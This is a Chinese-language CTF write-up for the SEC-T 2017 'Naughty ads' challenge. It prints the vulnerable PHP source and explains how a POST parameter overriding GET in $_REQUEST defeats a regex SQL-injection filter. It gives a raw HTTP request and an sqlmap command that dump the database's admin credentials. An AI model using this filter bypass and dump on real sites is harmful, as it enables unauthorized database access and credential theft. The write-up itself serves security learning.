Chybeta

SEC-T CTF2017-Naughty ads-writeup

发表于 | 分类于 | 阅读次数

SEC-T CTF2017-Naughty ads-writeup
sql注入

Task

1
2
3
4
Can you put agent Gill in the naughty ad section? His phone number is "555-31338"
Solves: 40
Service: http://naughtyads.alieni.se/
Author: avlidienbrunn

Solution

扫描器扫到robots.txt ,访问:http://naughtyads.alieni.se/robots.txt

有一个admin,但访问需要输入账号和密码。

尝试访问: http://naughtyads.alieni.se/index.phps 。得到源代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
require_once 'lib.php';
header('X-XSS-Protection: 0');
$cols = array(
    "e8c4-437b-9476",
    "849e-416e-acf7",
    "7f9d-470f-8698",
    "c8bb-4695-93f7",
    "5fbc-4729-8821",
    "3ad3-46c3-b975",
    "f44f-4cc9-a5e0",
    "0c3f-42c8-a0ae"
    );
if(isset($_REQUEST['id'])){
    if(preg_match("/'(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
        die("Attack detected!!!");
    }
    $ad = get_ad($_GET['id']);
    ?>
    <HTML>
    <HEAD>
        <TITLE>NAUGHTY ADS ©1994</TITLE>
    </HEAD>
    <BODY BGCOLOR="WHITE">
        <CENTER>
        <?php echo $ad['description'] ?><br />
        <a href="/">Home</a>
        </CENTER>
    </BODY>
    </HTML>
    <?php
    die;
}
?>

对于 $_REQUEST[‘id’] ,进行了“严格”的正则匹配,不能正常的注出数据。接下来通过 $_GET[‘id’] 将其带入数据库中查询并返回结果给页面。

这里考察了一个知识。$_REQUEST变量默认情况下包含了 $_GET,$_POST 和 $_COOKIE 的数组。在 php.ini 配置文件中,有一个参数variables_order

其中几个字母(EGPCS)对应如下: Environment, Get, Post, Cookie, Server。这些字母的出现顺序,表明了数据的加载顺序。从三种默认配置来看,相对顺序均是GP,也就是说只要有POST参数进来,那么它就会覆盖同名的GET参数。如下图;

所以就本题而言,如果在GET参数id处注入数据(比如 union select),而同时我们又通过POST方法传入一个id参数,那么服务器检测的是无害的POST数据,而在进行查询时带入的是有害的GET数据。

将如下数据包保存为test.txt,用sqlmap跑:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /?id=* HTTP/1.1
Host: naughtyads.alieni.se
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
id= 0c3f-42c8-a0ae

命令:

1
python sqlmap.py -r test.txt -D naughty --dump

得到账号密码,登陆 http://naughtyads.alieni.se/admin/ 在Phone number处填上555-31338,提交后得到flag:

1
SECT{~tr4nsv3stiT3s_w3lc0me_t00~}

其实那个正则,是有问题的。。。很容易绕过的啦。

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:SEC-T CTF2017-Naughty ads-writeup

文章作者:chybeta

发布时间:2017年09月14日 - 10:09

最后更新:2017年09月17日 - 18:09

原始链接:http://chybeta.github.io/2017/09/14/SEC-T-CTF2017-Naughty-ads-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。